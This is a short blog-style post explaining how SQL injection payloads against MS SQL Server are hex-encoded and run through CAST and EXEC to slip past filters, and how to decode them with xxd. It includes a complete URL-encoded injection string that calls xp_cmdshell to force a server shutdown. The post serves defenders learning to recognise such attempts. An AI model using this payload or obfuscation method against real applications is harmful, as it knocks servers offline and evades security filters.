decoding sql injection attempts

October 10, 2011

Background

SQL Server has a function called CAST, that converts an ASCII codes array to text. Hackers can use this function to obfuscate the SQL Injection payload, and bypass filters that block SQL commands or hazardous characters.
Here is an example to an attack that uses this technique:

DECLARE @S CHAR(4000);
SET @S=CAST(0x The ASCII Code Array) AS CHAR(4000));
EXEC(@S);

The first step is to declare a variable that will contain the attack payload.
The second step is to set the variable with the payload, which is obfuscated and decoded using the CAST funciton.
In the third step, the payload is executed.

Sample Exploit

The following payload shuts down the Database server by executing the command ” exec master..xp_cmdshell ‘shutdown -f’ ” :

';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0×650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(4000));EXEC(@S);

Affected Products
MS SQL based web applications.

Let’s start decoding sql injection attempts

Payload

0x650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700

To Decode (on linux)

# echo "0x650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700" | xxd -r -p

This yields our payload:

exec master..xp_cmdshell 'shutdown -f'